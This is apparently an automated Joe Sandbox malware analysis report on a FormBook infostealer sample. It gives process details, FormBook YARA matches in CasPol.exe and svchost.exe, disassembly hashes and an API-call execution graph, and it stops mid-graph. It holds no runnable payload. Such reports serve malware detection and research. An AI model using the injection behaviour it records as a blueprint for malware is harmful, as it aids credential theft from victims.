                                                              Programmed in:.Net C# or VB.NET
                                                              Reputation:low

                                                              General

                                                              Target ID:1
                                                              Start time:12:44:12
                                                              Start date:10/02/2023
                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
                                                              Imagebase:0xc10000
                                                              File size:107624 bytes
                                                              MD5 hash:F866FC1C2E928779C7119353C3091F0C
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.312490227.00000000015C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.312490227.00000000015C0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.312490227.00000000015C0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              Reputation:moderate

                                                              General

                                                              Target ID:2
                                                              Start time:12:44:14
                                                              Start date:10/02/2023
                                                              Path:C:\Windows\explorer.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\Explorer.EXE
                                                              Imagebase:0x7ff69fe90000
                                                              File size:3933184 bytes
                                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              General

                                                              Target ID:11
                                                              Start time:12:44:31
                                                              Start date:10/02/2023
                                                              Path:C:\Windows\SysWOW64\svchost.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:C:\Windows\SysWOW64\svchost.exe
                                                              Imagebase:0x1a0000
                                                              File size:44520 bytes
                                                              MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.521718307.0000000000510000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.521718307.0000000000510000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.521718307.0000000000510000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.523056179.0000000002920000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.523056179.0000000002920000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.523056179.0000000002920000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              Reputation:high

                                                              General

                                                              Target ID:13
                                                              Start time:12:45:29
                                                              Start date:10/02/2023
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff745070000
                                                              File size:625664 bytes
                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                              Has elevated privileges:true
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              Disassembly

                                                              Reset < >

                                                                Executed Functions

                                                                Function 00007FFBB01E3993 Relevance: 2.7, Strings: 2, Instructions: 166COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.270167849.00007FFBB01E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBB01E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffbb01e0000_Requisito ordine n.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 6$?__H
                                                                • API String ID: 0-3710698900
                                                                • Opcode ID: aceb1dc8d783fc908d796599a953440f029c7cb99f3986dd4f2276985309318f
                                                                • Instruction ID: 4323a5400cb22e96be037354268bd906a082b6ed38c76ad21970f3b70e7a3771
                                                                • Opcode Fuzzy Hash: aceb1dc8d783fc908d796599a953440f029c7cb99f3986dd4f2276985309318f
                                                                • Instruction Fuzzy Hash: DF6199B090495D8FEBA9EB28C898AE9B7F5FF68341F4441EAE10DD7251DA349DC18F04
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00007FFBB01E11FD Relevance: 1.4, Strings: 1, Instructions: 195COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.270167849.00007FFBB01E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBB01E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffbb01e0000_Requisito ordine n.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ?__H
                                                                • API String ID: 0-2882066015
                                                                • Opcode ID: d77bd94932c34fa9ce6ec1b2cff9e931ee27de872ee162683b37cde184fb976e
                                                                • Instruction ID: 09116859d8de84721bd9b68e4fbe6c97c691c4392ea4e90d030f87bd91f7d8c1
                                                                • Opcode Fuzzy Hash: d77bd94932c34fa9ce6ec1b2cff9e931ee27de872ee162683b37cde184fb976e
                                                                • Instruction Fuzzy Hash: D271BAB091491D8FEBA9EB28C895AE9B7F5FF68341F4041E9E20DD7251DA349EC18F04
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00007FFBB01E0885 Relevance: .3, Instructions: 334COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.270167849.00007FFBB01E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBB01E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffbb01e0000_Requisito ordine n.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3f8f70752f47bb096a995a3053b97ce6a782fe61a8d41d11b01c8ef090660fe0
                                                                • Instruction ID: 603552c4ace47a10e47e14de478c1b91a50810d9ef7e9fb07e5c5aee019b1985
                                                                • Opcode Fuzzy Hash: 3f8f70752f47bb096a995a3053b97ce6a782fe61a8d41d11b01c8ef090660fe0
                                                                • Instruction Fuzzy Hash: 08C1B17191CA8D4FE786DB6C88647B97FF1EF6B345F4405BAD048CB293CA242886C711
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00007FFBB01E0540 Relevance: .2, Instructions: 169COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.270167849.00007FFBB01E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBB01E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffbb01e0000_Requisito ordine n.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 740b30ad046307c9f610c990f1412515919ca4ab3e13f2f29ae63c6b8c002735
                                                                • Instruction ID: c99b32c18ef102af30bc2e6a9e07cfd6047d4d4cae9df1d91ffe063ebf57936b
                                                                • Opcode Fuzzy Hash: 740b30ad046307c9f610c990f1412515919ca4ab3e13f2f29ae63c6b8c002735
                                                                • Instruction Fuzzy Hash: 5A518C71A08A5D8FDB89EF6CD4556FDBBF1FF59350F00016AE049D7292CA35A882CB90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00007FFBB01E0578 Relevance: .1, Instructions: 145COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.270167849.00007FFBB01E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBB01E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffbb01e0000_Requisito ordine n.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 914607cb833a2b02c35b81b4a7953cc6b5b7d90bd8784ed1c405189a2d341b67
                                                                • Instruction ID: 387e0d873c1804d0b2126c2491c0ddbfca0abd0c7e0e9dae6ff49987454ae516
                                                                • Opcode Fuzzy Hash: 914607cb833a2b02c35b81b4a7953cc6b5b7d90bd8784ed1c405189a2d341b67
                                                                • Instruction Fuzzy Hash: 43415E70A08A8D8FDB89EF6CC454AEDBBF1FF69340F10016AE449D7295CA34A881CB50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00007FFBB01E5C2C Relevance: .1, Instructions: 93COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.270167849.00007FFBB01E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBB01E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffbb01e0000_Requisito ordine n.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7023976c4a6909d6ec05aaf42384670ca3496d67106aa7510415fbfda6c9ad9f
                                                                • Instruction ID: 243b708e945320206e6e8addc4b644f10f05da2b3f91f100fc6f3def0affa379
                                                                • Opcode Fuzzy Hash: 7023976c4a6909d6ec05aaf42384670ca3496d67106aa7510415fbfda6c9ad9f
                                                                • Instruction Fuzzy Hash: BE3188B1D195298EEBA8DB28D8546B8B7F1FF64341F5001FAE10DE3295DA386AC08F44
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00007FFBB01E5E50 Relevance: .0, Instructions: 47COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.270167849.00007FFBB01E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBB01E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffbb01e0000_Requisito ordine n.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ad2a8e41cf006220772edde14273a21970e4e041feaf2df3f1be2a76e2637da8
                                                                • Instruction ID: 1db8524a279cbf516ab4cb6fb776857e703eeb3661f2fa170f9620d3ccce0125
                                                                • Opcode Fuzzy Hash: ad2a8e41cf006220772edde14273a21970e4e041feaf2df3f1be2a76e2637da8
                                                                • Instruction Fuzzy Hash: 1211B8B0D0952A8FEB69DB28C854BFCB3B1FB64741F5041F9E10DA2295DA386AC4CF54
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00007FFBB01E06B0 Relevance: .0, Instructions: 43COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.270167849.00007FFBB01E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBB01E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffbb01e0000_Requisito ordine n.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 59423d941eff4bce7ef40ca6d740f4a8612a74a693599e4948cc73dabead09d7
                                                                • Instruction ID: 096017d769b9b0aee60e409254efffd4816ff4a1b869357ca7378cf4be69641e
                                                                • Opcode Fuzzy Hash: 59423d941eff4bce7ef40ca6d740f4a8612a74a693599e4948cc73dabead09d7
                                                                • Instruction Fuzzy Hash: 8001E87092464D9FDF84EF28C889AE93BE0FF18305F00016AB80DD3254DB30E9A1CB85
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00007FFBB01E0825 Relevance: .0, Instructions: 43COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.270167849.00007FFBB01E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBB01E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffbb01e0000_Requisito ordine n.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 583726ddfefb73f06027242c9cbbddfccbb9a8645d32e09972bedc021efc06b4
                                                                • Instruction ID: 00137dbfd73aeebf6dbda33ab1f251608b625ce09b3dda1f3201434a005e10f3
                                                                • Opcode Fuzzy Hash: 583726ddfefb73f06027242c9cbbddfccbb9a8645d32e09972bedc021efc06b4
                                                                • Instruction Fuzzy Hash: 8BF0F46B70C5894BD312AA7DF8420EC7F10EFD2265F0A41BBD2C492182E624A15EC7A1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00007FFBB01E5DCD Relevance: .0, Instructions: 41COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.270167849.00007FFBB01E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBB01E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffbb01e0000_Requisito ordine n.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3b0424f5064c6315337e0279d42dfc6e01a1d284c823e13364b3490f7452ec60
                                                                • Instruction ID: 3adfe974059a16778043ce52152883c5657cbbeededf04c71a6c36d77d20b15d
                                                                • Opcode Fuzzy Hash: 3b0424f5064c6315337e0279d42dfc6e01a1d284c823e13364b3490f7452ec60
                                                                • Instruction Fuzzy Hash: 141186B0D0952E8EDBA8DB58C8547BDB7B1FB28741F0000F9D00DA6695DA786AC18F40
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00007FFBB01E0220 Relevance: .0, Instructions: 41COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.270167849.00007FFBB01E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBB01E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffbb01e0000_Requisito ordine n.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4bbd54cd31a69f995c15efbde2349923cf7d149995a896ea6c10c24083670fb2
                                                                • Instruction ID: fabe9c8e1c631beffa392b280dda529c358cdd3a4ef22828fed1d4e0455cf905
                                                                • Opcode Fuzzy Hash: 4bbd54cd31a69f995c15efbde2349923cf7d149995a896ea6c10c24083670fb2
                                                                • Instruction Fuzzy Hash: 3101A874908A0D9FDF94EF68D449AAE7BF0FF68301F00456AE819D3250DB70A990CB85
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00007FFBB01E0830 Relevance: .0, Instructions: 36COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.270167849.00007FFBB01E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBB01E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffbb01e0000_Requisito ordine n.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3a6725e0482d9ba4aeb6e51a9f185ee961a5de59eb97c769834e2e153916c2d3
                                                                • Instruction ID: 5c8c4a9de8c9efdd0c3d1ac8613dc276e8f63ba7b55d8ab3d64dc71be4df40ba
                                                                • Opcode Fuzzy Hash: 3a6725e0482d9ba4aeb6e51a9f185ee961a5de59eb97c769834e2e153916c2d3
                                                                • Instruction Fuzzy Hash: 37F0216750C1894BD315A93CF8020EC7F10EF92220F0501BEE3C496143D525615EC7A1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00007FFBB01E0138 Relevance: .0, Instructions: 30COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.270167849.00007FFBB01E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBB01E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffbb01e0000_Requisito ordine n.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 95c86210b4d243dd56e035503a17289435a554c83ec62c7a863b4092a112659b
                                                                • Instruction ID: 2fcf7cdbee24156fd0ac2cddf779abfb2f4e71fffee61370caca9b2b04680799
                                                                • Opcode Fuzzy Hash: 95c86210b4d243dd56e035503a17289435a554c83ec62c7a863b4092a112659b
                                                                • Instruction Fuzzy Hash: 7AF0827080460D9FDB84EF28D4497FE7BE0FF64304F10046AF80CC2250DA30A5A0CB80
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00007FFBB01E0758 Relevance: .0, Instructions: 26COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.270167849.00007FFBB01E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBB01E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffbb01e0000_Requisito ordine n.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9877f27665d79ba9273d38e2bbc93d0e88ae22b79435d568add0e1d4c7e75e4b
                                                                • Instruction ID: 215476676206561c7ffa188935ae92aa3d478f4ea2937c4d9b5b770196a0aa92
                                                                • Opcode Fuzzy Hash: 9877f27665d79ba9273d38e2bbc93d0e88ae22b79435d568add0e1d4c7e75e4b
                                                                • Instruction Fuzzy Hash: C6F0397081864D9FEB55EF68D8486BD77A4FF04304F4004BAF80CC2290EE34A6A4CB45
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00007FFBB01E0178 Relevance: .0, Instructions: 26COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.270167849.00007FFBB01E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBB01E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffbb01e0000_Requisito ordine n.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: af1b8041b6a1536ea25343d1f10341bd09dde87242e34b2069e87cacd12483a1
                                                                • Instruction ID: b4f6288640bb1f83888025b06a079f60389edc407e8c03bff85f29d6efe8578a
                                                                • Opcode Fuzzy Hash: af1b8041b6a1536ea25343d1f10341bd09dde87242e34b2069e87cacd12483a1
                                                                • Instruction Fuzzy Hash: F5F0393081864D9FEB59EFA8D4096BDBBA4FF04345F8004BAE80CC2290DA34A594CB45
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00007FFBB01E0738 Relevance: .0, Instructions: 16COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.270167849.00007FFBB01E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBB01E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffbb01e0000_Requisito ordine n.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 16ddd5280123ddf2683a69be98b9195bab19833575da60afd2c0d8bc03a22c7a
                                                                • Instruction ID: 73ea7f8e27dce55955edb41be0205338ae811eee222ae1f2eb4345e7bb2c1178
                                                                • Opcode Fuzzy Hash: 16ddd5280123ddf2683a69be98b9195bab19833575da60afd2c0d8bc03a22c7a
                                                                • Instruction Fuzzy Hash: 2BD0A771C4C10E41F72976B8E4492FD72D4FF44384F400935F50E805C2DE6971A4C586
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00007FFBB01E5037 Relevance: .0, Instructions: 14COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.270167849.00007FFBB01E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBB01E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffbb01e0000_Requisito ordine n.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f7fc24d20472e97ed9a0bf44eda01d8c57493621153e9a2a5fb3539fd42d1539
                                                                • Instruction ID: e5f2729ccb75836afc803822b17f7007e9cd492132df691a709d61590e68fe2d
                                                                • Opcode Fuzzy Hash: f7fc24d20472e97ed9a0bf44eda01d8c57493621153e9a2a5fb3539fd42d1539
                                                                • Instruction Fuzzy Hash: 72E09274D046298ADBA9EB18C8587BCB2B5EB68344F0000E9D00DA3691CB746EC1DF04
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Execution Graph

                                                                Execution Coverage:3.8%
                                                                Dynamic/Decrypted Code Coverage:2.5%
                                                                Signature Coverage:3.9%
                                                                Total number of Nodes:644
                                                                Total number of Limit Nodes:84
                                                                execution_graph 33510 420113 33513 41e7d3 33510->33513 33518 41f223 33513->33518 33515 41e7ef 33522 1669a00 LdrInitializeThunk 33515->33522 33516 41e80a 33519 41f2a8 33518->33519 33521 41f232 33518->33521 33519->33515 33521->33519 33523 4195b3 33521->33523 33522->33516 33524 4195c1 33523->33524 33525 4195cd 33523->33525 33524->33525 33528 419a33 LdrLoadDll 33524->33528 33525->33519 33527 41971f 33527->33519 33528->33527 33529 40b493 33530 40b4b8 33529->33530 33535 40ced3 33530->33535 33534 40b510 33536 40cef7 33535->33536 33537 40cf33 LdrLoadDll 33536->33537 33538 40b4eb 33536->33538 33537->33538 33538->33534 33539 40ea93 33538->33539 33540 40eabf 33539->33540 33550 41e433 33540->33550 33543 40eadf 33543->33534 33547 40eb1a 33559 41e6e3 33547->33559 33549 40eb3d 33549->33534 33551 41f223 LdrLoadDll 33550->33551 33552 40ead8 33551->33552 33552->33543 33553 41e473 33552->33553 33554 41f223 LdrLoadDll 33553->33554 33555 41e48f 33554->33555 33562 1669710 LdrInitializeThunk 33555->33562 33556 40eb02 33556->33543 33558 41ea63 LdrLoadDll 33556->33558 33558->33547 33560 41e6ff NtClose 33559->33560 33561 41f223 LdrLoadDll 33559->33561 33560->33549 33561->33560 33562->33556 33564 401646 33565 40170c 33564->33565 33569 4233f8 33565->33569 33574 423403 33565->33574 33566 401783 33570 423404 33569->33570 33571 423459 33569->33571 33577 41fc53 33570->33577 33571->33566 33575 42340e 33574->33575 33576 41fc53 22 API calls 33574->33576 33575->33566 33576->33575 33578 41fc79 33577->33578 33591 40be63 33578->33591 33580 41fc85 33590 41fce9 33580->33590 33599 410093 33580->33599 33582 41fca4 33583 41fcb7 33582->33583 33611 410053 33582->33611 33586 41fccc 33583->33586 33620 41e903 33583->33620 33616 4034e3 33586->33616 33588 41fcdb 33589 41e903 2 API calls 33588->33589 33589->33590 33590->33566 33623 40bdb3 33591->33623 33593 40be70 33594 40be77 33593->33594 33635 40bd53 33593->33635 33594->33580 33600 4100bf 33599->33600 34029 40d3a3 33600->34029 33602 4100d1 34033 40ff63 33602->34033 33605 410104 33608 410115 33605->33608 33610 41e6e3 2 API calls 33605->33610 33606 4100ec 33607 4100f7 33606->33607 33609 41e6e3 2 API calls 33606->33609 33607->33582 33608->33582 33609->33607 33610->33608 33612 4195b3 LdrLoadDll 33611->33612 33613 410072 33612->33613 33614 410079 33613->33614 33615 41007b GetUserGeoID 33613->33615 33614->33583 33615->33583 33617 40353a 33616->33617 33619 403547 33617->33619 34053 40dd33 33617->34053 33619->33588 33621 41e922 ExitProcess 33620->33621 33622 41f223 LdrLoadDll 33620->33622 33622->33621 33624 40bdc6 33623->33624 33674 41ce83 LdrLoadDll 33623->33674 33654 41cd43 33624->33654 33627 40bdd9 33627->33593 33628 40bdcf 33628->33627 33657 41f5a3 33628->33657 33630 40be16 33630->33627 33668 40bbf3 33630->33668 33632 40be36 33675 40b653 LdrLoadDll 33632->33675 33634 40be48 33634->33593 33636 40bd70 33635->33636 33637 41f893 LdrLoadDll 33635->33637 34011 41f893 33636->34011 33637->33636 33640 41f893 LdrLoadDll 33641 40bd9d 33640->33641 33642 40fe53 33641->33642 33643 40fe6c 33642->33643 34015 40d223 33643->34015 33645 40fe7f 33646 41e433 LdrLoadDll 33645->33646 33647 40fe8e 33646->33647 33653 40be88 33647->33653 34019 41ea23 33647->34019 33649 40fea5 33652 40fed0 33649->33652 34022 41e4b3 33649->34022 33651 41e6e3 2 API calls 33651->33653 33652->33651 33653->33580 33655 41cd58 33654->33655 33676 41e853 LdrLoadDll 33654->33676 33655->33628 33658 41f5bc 33657->33658 33677 4191a3 33658->33677 33660 41f5d4 33661 41f5dd 33660->33661 33716 41f3e3 33660->33716 33661->33630 33663 41f5f1 33663->33661 33733 41e153 33663->33733 33665 41f625 33738 420153 33665->33738 33989 4093e3 33668->33989 33670 40bc14 33670->33632 33671 40bc0d 33671->33670 34002 4096a3 33671->34002 33674->33624 33675->33634 33676->33655 33678 4194e6 33677->33678 33680 4191b7 33677->33680 33678->33660 33680->33678 33741 41dea3 33680->33741 33682 4192e8 33744 41e5b3 33682->33744 33683 4192cb 33801 41e6b3 LdrLoadDll 33683->33801 33686 41930f 33688 420153 2 API calls 33686->33688 33687 4192d5 33687->33660 33692 41931b 33688->33692 33689 4194aa 33690 41e6e3 2 API calls 33689->33690 33693 4194b1 33690->33693 33691 4194c0 33807 418ec3 LdrLoadDll NtReadFile NtClose 33691->33807 33692->33687 33692->33689 33692->33691 33696 4193b3 33692->33696 33693->33660 33695 4194d3 33695->33660 33697 41941a 33696->33697 33699 4193c2 33696->33699 33697->33689 33698 41942d 33697->33698 33803 41e533 33698->33803 33701 4193c7 33699->33701 33702 4193db 33699->33702 33802 418d83 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 33701->33802 33703 4193e0 33702->33703 33704 4193f8 33702->33704 33747 418e23 33703->33747 33704->33693 33759 418b43 33704->33759 33707 4193d1 33707->33660 33710 4193ee 33710->33660 33712 41948d 33713 41e6e3 2 API calls 33712->33713 33715 419499 33713->33715 33714 419410 33714->33660 33715->33660 33718 41f3fe 33716->33718 33717 41f410 33717->33663 33718->33717 33825 4200d3 33718->33825 33720 41f430 33828 4187a3 33720->33828 33722 41f453 33722->33717 33723 4187a3 3 API calls 33722->33723 33726 41f475 33723->33726 33725 41f4fd 33727 41f50d 33725->33727 33955 41f1a3 LdrLoadDll 33725->33955 33726->33717 33860 419b03 33726->33860 33871 41f013 33727->33871 33730 41f53b 33950 41e113 33730->33950 33732 41f565 33732->33663 33734 41e16f 33733->33734 33735 41f223 LdrLoadDll 33733->33735 33983 166967a 33734->33983 33735->33734 33736 41e18a 33736->33665 33986 41e8c3 33738->33986 33740 41f64f 33740->33630 33742 41f223 LdrLoadDll 33741->33742 33743 41929c 33742->33743 33743->33682 33743->33683 33743->33687 33745 41f223 LdrLoadDll 33744->33745 33746 41e5cf NtCreateFile 33745->33746 33746->33686 33748 418e3f 33747->33748 33749 41e533 LdrLoadDll 33748->33749 33750 418e60 33749->33750 33751 418e67 33750->33751 33752 418e7b 33750->33752 33753 41e6e3 2 API calls 33751->33753 33754 41e6e3 2 API calls 33752->33754 33755 418e70 33753->33755 33756 418e84 33754->33756 33755->33710 33808 420273 LdrLoadDll RtlAllocateHeap 33756->33808 33758 418e8f 33758->33710 33760 418bc1 33759->33760 33761 418b8e 33759->33761 33762 418d09 33760->33762 33766 418bdd 33760->33766 33763 41e533 LdrLoadDll 33761->33763 33764 41e533 LdrLoadDll 33762->33764 33765 418ba9 33763->33765 33771 418d24 33764->33771 33767 41e6e3 2 API calls 33765->33767 33768 41e533 LdrLoadDll 33766->33768 33769 418bb2 33767->33769 33770 418bf8 33768->33770 33769->33714 33773 418c14 33770->33773 33774 418bff 33770->33774 33821 41e573 LdrLoadDll 33771->33821 33777 418c19 33773->33777 33781 418c2f 